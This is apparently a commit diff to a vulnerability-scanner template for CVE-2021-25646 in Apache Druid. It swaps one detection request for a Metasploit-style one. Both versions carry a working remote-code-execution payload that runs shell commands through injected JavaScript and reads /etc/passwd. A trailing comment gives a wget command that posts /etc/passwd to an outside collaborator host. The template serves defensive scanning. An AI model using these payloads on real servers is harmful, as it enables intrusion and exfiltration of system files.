The default request never flagged druid in my env. Replaced with MSF request and it flags everytime now

2021-06-24 13:37:45 -04:00 · 2021-06-24 13:37:45 -04:00 · 16e5ad7fad
parent a192570ddf
commit 16e5ad7fad
1 changed files with 6 additions and 12 deletions
--- a/cves/2021/CVE-2021-25646.yaml
+++ b/cves/2021/CVE-2021-25646.yaml
@ -13,22 +13,16 @@ info:
 requests:
  - raw:
      - |
-        POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
+        POST /druid/indexer/v1/sampler HTTP/1.1
        Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
+        Accept: application/json, text/plain, */*
        Content-Type: application/json
-        Content-Length: 1006
+        Content-Length: 571
        Connection: close

-        {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
-                                                "function": "function(value){return java.lang.Runtime.getRuntime().exec('wget example.com')}",
-                                                "dimension": "added",
-                                                "": {
-                                                        "enabled": "true"
-                                                }
-                                        }
-                                }
-          },"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}
+
+        {"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/etc","filter":"passwd"}},"dataSchema":{"dataSource":"odgjxrrrePz","parser":{"parseSpec":{"format":"javascript","timestampSpec":{},"dimensionsSpec":{},"function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~echo lgxTckL7cwJwki6GTZbjf9gF6BTSZTGO\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":10}}

    # To read system Files, replace (wget example.com) with below payload
    # wget --post-file /etc/passwd http://xxxxxxx.burpcollaborator.net